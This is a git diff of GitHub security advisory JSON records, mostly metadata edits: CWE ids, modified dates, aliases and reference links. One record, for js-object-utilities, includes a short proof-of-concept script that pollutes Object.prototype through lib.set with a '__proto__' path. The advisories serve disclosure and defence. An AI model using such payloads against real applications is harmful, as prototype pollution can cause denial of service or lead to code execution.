diff --git a/advisories/github-reviewed/2022/02/GHSA-6hv3-7c34-4hx8/GHSA-6hv3-7c34-4hx8.json b/advisories/github-reviewed/2022/02/GHSA-6hv3-7c34-4hx8/GHSA-6hv3-7c34-4hx8.json index 94a21bee5db..05ac0fe5e36 100644 --- a/advisories/github-reviewed/2022/02/GHSA-6hv3-7c34-4hx8/GHSA-6hv3-7c34-4hx8.json +++ b/advisories/github-reviewed/2022/02/GHSA-6hv3-7c34-4hx8/GHSA-6hv3-7c34-4hx8.json @@ -71,6 +71,7 @@ ], "database_specific": { "cwe_ids": [ + "CWE-200", "CWE-526" ], "severity": "MODERATE", diff --git a/advisories/github-reviewed/2022/02/GHSA-q9x4-q76f-5h5j/GHSA-q9x4-q76f-5h5j.json b/advisories/github-reviewed/2022/02/GHSA-q9x4-q76f-5h5j/GHSA-q9x4-q76f-5h5j.json index 0294f4c55b0..f03b83b7ef9 100644 --- a/advisories/github-reviewed/2022/02/GHSA-q9x4-q76f-5h5j/GHSA-q9x4-q76f-5h5j.json +++ b/advisories/github-reviewed/2022/02/GHSA-q9x4-q76f-5h5j/GHSA-q9x4-q76f-5h5j.json @@ -69,7 +69,9 @@ } ], "database_specific": { - "cwe_ids": [], + "cwe_ids": [ + "CWE-204" + ], "severity": "MODERATE", "github_reviewed": true, "github_reviewed_at": "2021-05-24T18:52:37Z", diff --git a/advisories/github-reviewed/2022/07/GHSA-697v-pxg3-j262/GHSA-697v-pxg3-j262.json b/advisories/github-reviewed/2022/07/GHSA-697v-pxg3-j262/GHSA-697v-pxg3-j262.json index 76508d1cf37..f19ba41adfe 100644 --- a/advisories/github-reviewed/2022/07/GHSA-697v-pxg3-j262/GHSA-697v-pxg3-j262.json +++ b/advisories/github-reviewed/2022/07/GHSA-697v-pxg3-j262/GHSA-697v-pxg3-j262.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-697v-pxg3-j262", - "modified": "2023-01-10T15:47:23Z", + "modified": "2025-04-14T22:10:03Z", "published": "2022-07-15T20:55:21Z", "aliases": [ "CVE-2020-28191" @@ -48,10 +48,6 @@ "type": "WEB", "url": "https://github.com/togglz/togglz/commit/ed66e3f584de954297ebaf98ea4a235286784707" }, - { - "type": "ADVISORY", - "url": "https://github.com/advisories/GHSA-697v-pxg3-j262" - }, { "type": "PACKAGE", "url": "https://github.com/togglz/togglz" diff --git a/advisories/github-reviewed/2022/07/GHSA-rpr3-cw39-3pxh/GHSA-rpr3-cw39-3pxh.json b/advisories/github-reviewed/2022/07/GHSA-rpr3-cw39-3pxh/GHSA-rpr3-cw39-3pxh.json index 16616346425..60e0e957800 100644 --- a/advisories/github-reviewed/2022/07/GHSA-rpr3-cw39-3pxh/GHSA-rpr3-cw39-3pxh.json +++ b/advisories/github-reviewed/2022/07/GHSA-rpr3-cw39-3pxh/GHSA-rpr3-cw39-3pxh.json @@ -1,12 +1,12 @@ { "schema_version": "1.4.0", "id": "GHSA-rpr3-cw39-3pxh", - "modified": "2023-01-10T15:40:17Z", + "modified": "2025-04-14T22:08:43Z", "published": "2022-07-15T19:41:47Z", "aliases": [ "CVE-2020-10650" ], - "summary": "jackson-databind before 2.9.10.4 vulnerable to unsafe deserialization", + "summary": "jackson-databind vulnerable to unsafe deserialization", "details": "The com.fasterxml.jackson.core:jackson-databind library before version 2.9.10.4 is vulnerable to an Unsafe Deserialization vulnerability when handling interactions related to the class `ignite-jta`.", "severity": [ { @@ -67,10 +67,6 @@ "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2023/04/msg00032.html" }, - { - "type": "WEB", - "url": "https://medium.com/%40cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062" - }, { "type": "WEB", "url": "https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062" diff --git a/advisories/github-reviewed/2022/12/GHSA-6q6q-88xp-6f2r/GHSA-6q6q-88xp-6f2r.json b/advisories/github-reviewed/2022/12/GHSA-6q6q-88xp-6f2r/GHSA-6q6q-88xp-6f2r.json index 4d660c0f0f6..57239da6d5d 100644 --- a/advisories/github-reviewed/2022/12/GHSA-6q6q-88xp-6f2r/GHSA-6q6q-88xp-6f2r.json +++ b/advisories/github-reviewed/2022/12/GHSA-6q6q-88xp-6f2r/GHSA-6q6q-88xp-6f2r.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-6q6q-88xp-6f2r", - "modified": "2023-03-01T18:40:10Z", + "modified": "2025-04-14T22:10:15Z", "published": "2022-12-28T00:30:22Z", "aliases": [ "CVE-2022-3064" diff --git a/advisories/github-reviewed/2022/12/GHSA-ppp9-7jff-5vj2/GHSA-ppp9-7jff-5vj2.json b/advisories/github-reviewed/2022/12/GHSA-ppp9-7jff-5vj2/GHSA-ppp9-7jff-5vj2.json index ee69c36134d..3cf62758ca5 100644 --- a/advisories/github-reviewed/2022/12/GHSA-ppp9-7jff-5vj2/GHSA-ppp9-7jff-5vj2.json +++ b/advisories/github-reviewed/2022/12/GHSA-ppp9-7jff-5vj2/GHSA-ppp9-7jff-5vj2.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-ppp9-7jff-5vj2", - "modified": "2023-01-09T20:02:12Z", + "modified": "2025-04-14T22:09:42Z", "published": "2022-12-26T06:30:22Z", "aliases": [ "CVE-2021-38561" diff --git a/advisories/github-reviewed/2024/10/GHSA-hf59-7rwq-785m/GHSA-hf59-7rwq-785m.json b/advisories/github-reviewed/2024/10/GHSA-hf59-7rwq-785m/GHSA-hf59-7rwq-785m.json index 62375f4e978..8dd2a706e34 100644 --- a/advisories/github-reviewed/2024/10/GHSA-hf59-7rwq-785m/GHSA-hf59-7rwq-785m.json +++ b/advisories/github-reviewed/2024/10/GHSA-hf59-7rwq-785m/GHSA-hf59-7rwq-785m.json @@ -1,13 +1,13 @@ { "schema_version": "1.4.0", "id": "GHSA-hf59-7rwq-785m", - "modified": "2024-10-23T18:41:20Z", + "modified": "2025-04-14T22:10:39Z", "published": "2024-10-23T17:22:30Z", "aliases": [ "CVE-2024-49756" ], "summary": "In AshPostgres, empty, atomic, non-bulk actions, policy bypass for side-effects vulnerability.", - "details": "### Impact\n_What kind of vulnerability is it? Who is impacted?_\n\nIn certain *very specific* situations, it was possible for the policies of an update action to be skipped. This occurred only on \"empty\" update actions (no changing fields), and would allow their hooks (side effects) to be performed when they should not have been. Note that this does not allow reading new data that the user should not have had access to, only triggering a side effect a user should not have been able to trigger.\n\nYou must have an update action that:\n\n- Is on a resource with no attributes containing an \"update default\" (updated_at timestamp, for example)\n- can be performed atomically. \n- Does *not* have `require_atomic? false`\n- Has at least one authorizer (typically `Ash.Policy.Authorizer`)\n- Has at least one `change` (on the resource's `changes` block or in the action itself)\n This is where the side-effects would be performed when they should not have been.\n\n--- \n\n- Is there ever a place where you call this action manually, using `Ash.update`. \n Note that AshGraphql and AshJsonApi action calls are *not* affected as they use `Ash.bulk_update`. \n- If so, is there ever a case where you call the action with zero inputs, and have it produce zero changing fields.\n- If so, could it then produce a side effect. This means you'd have an after_action hook that calls some other resource.\n- If so, does that side effect bypass another resource's policies, i.e using `authorize?: false`, or not providing the same actor.\n\n\nEverything above the line can be checked with the provided script. Everything below it, must be checked manually. The script for checking this is available in the \"Might I be affected\" section. \n\n**The script can have false *positives*, but will not have any false *negatives*. So if you run the script, and it says \"No potential vulnerabilities found\", then all you need to do is update ash_postgres.** \n\n\n### Patches\nThis problem has been patched in `2.4.10` of `ash_postgres`.\n\n### Workarounds\n\nYou could:\n\n1. Determine that none of your actions are vulnerable using the script.\n2. Add `require_atomic? false` to any potentially affected update action\n3. Replace any usage of `Ash.update` with `Ash.bulk_update` for an affected action\n4. add an update timestamp to your action.\n\n### Might I be affected\n\nThis gist provides a script you can run to detect if you are potentially vulnerable.\n\nhttps://gist.github.com/zachdaniel/e49166b765978c48dfaf998d06df436e\n\n### References\n\nOriginal Report/discovery: https://elixirforum.com/t/empty-update-action-with-policies/66954\nFix commit: https://github.com/ash-project/ash_postgres/commit/1228fcd851f29a68609e236f7d6a2622a4b5c4ba\n", + "details": "### Impact\n_What kind of vulnerability is it? Who is impacted?_\n\nIn certain *very specific* situations, it was possible for the policies of an update action to be skipped. This occurred only on \"empty\" update actions (no changing fields), and would allow their hooks (side effects) to be performed when they should not have been. Note that this does not allow reading new data that the user should not have had access to, only triggering a side effect a user should not have been able to trigger.\n\nYou must have an update action that:\n\n- Is on a resource with no attributes containing an \"update default\" (updated_at timestamp, for example)\n- can be performed atomically. \n- Does *not* have `require_atomic? false`\n- Has at least one authorizer (typically `Ash.Policy.Authorizer`)\n- Has at least one `change` (on the resource's `changes` block or in the action itself)\n This is where the side-effects would be performed when they should not have been.\n\n--- \n\n- Is there ever a place where you call this action manually, using `Ash.update`. \n Note that AshGraphql and AshJsonApi action calls are *not* affected as they use `Ash.bulk_update`. \n- If so, is there ever a case where you call the action with zero inputs, and have it produce zero changing fields.\n- If so, could it then produce a side effect. This means you'd have an after_action hook that calls some other resource.\n- If so, does that side effect bypass another resource's policies, i.e using `authorize?: false`, or not providing the same actor.\n\n\nEverything above the line can be checked with the provided script. Everything below it, must be checked manually. The script for checking this is available in the \"Might I be affected\" section. \n\n**The script can have false *positives*, but will not have any false *negatives*. So if you run the script, and it says \"No potential vulnerabilities found\", then all you need to do is update ash_postgres.** \n\n\n### Patches\nThis problem has been patched in `2.4.10` of `ash_postgres`.\n\n### Workarounds\n\nYou could:\n\n1. Determine that none of your actions are vulnerable using the script.\n2. Add `require_atomic? false` to any potentially affected update action\n3. Replace any usage of `Ash.update` with `Ash.bulk_update` for an affected action\n4. add an update timestamp to your action.\n\n### Might I be affected\n\nThis gist provides a script you can run to detect if you are potentially vulnerable.\n\nhttps://gist.github.com/zachdaniel/e49166b765978c48dfaf998d06df436e\n\n### References\n\nOriginal Report/discovery: https://elixirforum.com/t/empty-update-action-with-policies/66954\nFix commit: https://github.com/ash-project/ash_postgres/commit/1228fcd851f29a68609e236f7d6a2622a4b5c4ba", "severity": [ { "type": "CVSS_V3", diff --git a/advisories/github-reviewed/2025/04/GHSA-hpqf-m68j-2pfx/GHSA-hpqf-m68j-2pfx.json b/advisories/github-reviewed/2025/04/GHSA-hpqf-m68j-2pfx/GHSA-hpqf-m68j-2pfx.json index 16c690c396f..57251bd0072 100644 --- a/advisories/github-reviewed/2025/04/GHSA-hpqf-m68j-2pfx/GHSA-hpqf-m68j-2pfx.json +++ b/advisories/github-reviewed/2025/04/GHSA-hpqf-m68j-2pfx/GHSA-hpqf-m68j-2pfx.json @@ -1,9 +1,11 @@ { "schema_version": "1.4.0", "id": "GHSA-hpqf-m68j-2pfx", - "modified": "2025-04-07T18:52:04Z", + "modified": "2025-04-14T22:11:03Z", "published": "2025-04-07T18:52:04Z", - "aliases": [], + "aliases": [ + "CVE-2025-28269" + ], "summary": "js-object-utilities Vulnerable to Prototype Pollution", "details": "**Vulnerability type:**\nPrototype Pollution\n\n**Affected Package:**\n* Product: js-object-utilities\n* Version: 2.2.0\n\n**Remedy:**\n\nUpdate package to version 2.2.1.\n\n**Vulnerability Location(s):**\n```js\nat module.exports (/node_modules/js-object-utilities/dist/set.js:16:29)\n```\n\n**Description:**\n\nThe latest version of `js-object-utilities (2.2.0)`, (previous versions are also affected), is vulnerable to Prototype Pollution through the entry function(s) `lib.set`. An attacker can supply a payload with Object.prototype setter to introduce or modify properties within the global prototype chain, causing denial of service (DoS) a the minimum consequence.\n\nMoreover, the consequences of this vulnerability can escalate to other injection-based attacks, depending on how the library integrates within the application. For instance, if the polluted property propagates to sensitive Node.js APIs (e.g., exec, eval), it could enable an attacker to execute arbitrary commands within the application's context.\n\n**PoC:**\n\n```bash\n// install the package with the latest version\n~$ npm install js-object-utilities@2.2.0\n// run the script mentioned below \n~$ node poc.js\n//The expected output (if the code still vulnerable) is below. \n// Note that the output may slightly differs from function to another.\nBefore Attack: {}\nAfter Attack: {\"pollutedKey\":123}\n```\n\n```js\n// poc.js\n(async () => {\n const lib = await import('js-object-utilities');\n var someObj = {}\n console.log(\"Before Attack: \", JSON.stringify({}.__proto__));\n try {\n // for multiple functions, uncomment only one for each execution.\n Reflect.apply(lib.set, {}, [someObj, \"__proto__.pollutedKey\", 123]);\n } catch (e) { }\n console.log(\"After Attack: \", JSON.stringify({}.__proto__));\n delete Object.prototype.pollutedKey;\n})();\n```\n\n**Reporter Credit:**\n\nTariq Hawis", "severity": [